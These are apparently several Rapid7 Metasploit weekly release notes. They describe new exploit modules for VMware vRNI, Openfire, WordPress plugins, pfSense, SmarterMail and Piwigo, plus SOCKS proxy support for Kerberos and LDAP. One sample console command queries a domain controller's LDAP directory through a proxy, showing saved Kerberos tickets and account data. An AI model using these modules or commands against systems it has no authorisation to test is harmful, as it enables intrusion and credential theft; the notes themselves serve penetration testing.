This release adds support for sending Kerberos and LDAP traffic through user configurable Socks4/Socks5 proxies. The proxies can be set with the Proxies datastore option. This functionality is supported by most modules, such as SMB/WinRM/etc. An example network environment would be:

[ Attacker Machine ] -> [ Socks Proxy (192.168.123.144) ] -> [ Target (10.20.0.137)]

For instance running the auxiliary/gather/ldap_query module with the inline option proxies=socks5:192.168.123.144:1080, or using the older set proxies socks5:192.168.123.144:1080 syntax, will send the network traffic through the user specified Socks proxy – requesting both the Kerberos tickets for authentication as well as the LDAP query itself:

msf6 auxiliary(gather/ldap_query) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.137

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_426003.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_291783.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.137:389 Discovered base DN: DC=adf3,DC=local
[+] 10.20.0.137:389 Discovered schema DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-07-10 16:02:38 UTC
… omitted …

New module content (2)

VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE

Authors: Anonymous with Trend Micro Zero Day Initiative, Sina Kheirkhah, and h00die
Type: Exploit
Pull request: #18199 contributed by h00die
Path: exploits/linux/http/vmware_vrni_rce_cve_2023_20887
AttackerKB reference: CVE-2023-20887

Description: This adds an exploit module that leverages a pre-authenticated command injection vulnerability in VMWare Aria Operations for Networks (vRealize Network Insight). Versions from 6.2 to 6.10 are vulnerable and this has been identified as CVE-2023-20887. The module bypasses the reverse proxy that protects the access to the Apache Thrift RPC interface and executes arbitrary commands on the underlying operating system as the root user.

WordPress File Manager Advanced Shortcode 2.3.2 – Unauthenticated Remote Code Execution through shortcode

Authors: Mateus Machado Tesser and h00die-gr3y
Type: Exploit
Pull request: #18142 contributed by h00die-gr3y
Path: exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce
AttackerKB reference: CVE-2023-2068

Description: This adds a WordPress exploit that makes use of the WordPress File Manager Advanced Shortcode 2.3.2 plugin, to gain unauthenticated Remote Code Execution through shortcode.

Enhancements and features (1)

• #18096 from adfoster-r7 – Updates the LDAP query module and the Kerberos authentication support for WinRM/MSSQL/SMB/LDAP/etc to work in conjunction with the user’s set Proxies datastore value, i.e. set Proxies socks5:127.0.0.1:1080.

Bugs fixed (3)

• #18187 from cgranleese-r7 – Fixes a crash when running Ruby 3.3.0-preview1 with modules that used invalid syntax when packing or unpacking binary data.
• #18213 from adfoster-r7 – This fixes a bug in the evasion/windows/syscall_inject module that was caused by an uninitialized variable.
• #18225 from adfoster-r7 – This fixes multiple missing/invalid references in modules.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.26…6.3.27
• Full diff 6.3.26…6.3.27

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Jack Heysel original https://blog.rapid7.com/2023/07/21/metasploit-weekly-wrap-up-20/

It’s open season on Openfire with a new RCE module in Metasploit

This week the Metasploit framework saw the addition of an RCE module which exploits path traversal vulnerability in the instant messaging and group chat server, Openfire. The module was submitted by the one and only community contributor h00die-gr3y. The module targets Openfire’s unauthenticated setup environment, in an already configured Openfire environment, to access restricted pages in the Admin Console reserved for administrative users. This module uses a path traversal vulnerability to create a new admin user that is used to upload a Openfire management plugin weaponized with a Java native payload that triggers an RCE. The module is quite flexible and will get you shells when Openfire is running in Windows, Linux and on a variety of different Java versions.

New module content (2)

Piwigo CVE-2023-26876 Gather Credentials via SQL Injection

Authors: Rodolfo Tavares, Tempest Security, Henrique Arcoverde, and rodnt
Type: Auxiliary
Pull request: #18182 contributed by rodnt
AttackerKB reference: CVE-2023-26876

Description: This PR adds an auxiliary module that takes advantage of CVE-2023-26876 to retrieve the username and password hash from piwigo v.13.5.0 and earlier.

Openfire authentication bypass with RCE plugin

Author: h00die-gr3y
Type: Exploit
Pull request: #18173 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-32315

Description: This PR adds a module for CVE-2023-32315, a remote code execution vulnerability for all versions of Openfire that have been released since April 2015, starting with version 3.10.0. Patched versions are 4.7.5+ 4.6.8+ and 4.8.0+.

Enhancements and features (1)

• #17681 from MegaManSec – This PR adds a new datastore option for Jenkins home directory to the jenkins_gather module.

Bugs fixed (0)

None

Documentation added (1)

• #18186 from adfoster-r7 – This PR updates multiple code and console snippets within the Wiki to now have syntax highlighting

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.25…6.3.26
• Full diff 6.3.25…6.3.26

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Navya Harika Karaka original https://blog.rapid7.com/2023/07/14/metasploit-weekly-wrap-up-19/

Authentication bypass in WordPress Plugin WooCommerce Payments

This week’s Metasploit release includes a module for CVE-2023-28121 by h00die. This module can be used against any wordpress instance that uses WooCommerce payments < 5.6.1. This module exploits an auth by-pass vulnerability in the WooCommerce WordPress plugin. You can simply add a header to execute the bypass and use the API to create a new admin user in WordPress.

New module content (3)

WordPress Plugin WooCommerce Payments Unauthenticated Admin Creation

Authors: Julien Ahrens, Michael Mazzolini, and h00die
Type: Auxiliary
Pull request: #18164 contributed by h00die
AttackerKB reference: CVE-2023-28121

Description: This module exploits an auth by-pass vulnerability in the WooCommerce WordPress plugin. By sending a speciality crafted request to the plugin an attacker can by-pass authentication and then use the WordPress API to create an admin user in WordPress.

pfSense Restore RRD Data Command Injection

Author: Emir Polat
Type: Exploit
Pull request: #17861 contributed by emirpolatt
AttackerKB reference: CVE-2023-27253

Description: This module exploits a vulnerability in pfSense version 2.6.0 and below which allows for authenticated users to execute arbitrary operating systems commands as root.

SmarterTools SmarterMail less than build 6985 – .NET Deserialization Remote Code Execution

Authors: 1F98D, Ismail E. Dawoodjee, and Soroush Dalili
Type: Exploit
Pull request: #18170 contributed by ismaildawoodjee
AttackerKB reference: CVE-2019-7214

Description: Adds a new module for SmarterMail Build 6985 – dotNET Deserialization Remote Code Execution (CVE-2019-7214). The vulnerability affects SmarterTools SmarterMail Version less than or equal to 16.3.6989.16341 (all legacy versions without a build number), or SmarterTools SmarterMail Build less than 6985.

Enhancements and features (0)

None

Bugs fixed (0)

None

Documentation added (2)

• #18177 from ismaildawoodjee – Updates the Wiki to use https://metasploit.com/download instead of http://metasploit.com/download.
• #18181 from hahwul – Updates broken links in the Wiki.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.24…6.3.25
• Full diff 6.3.24…6.3.25

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).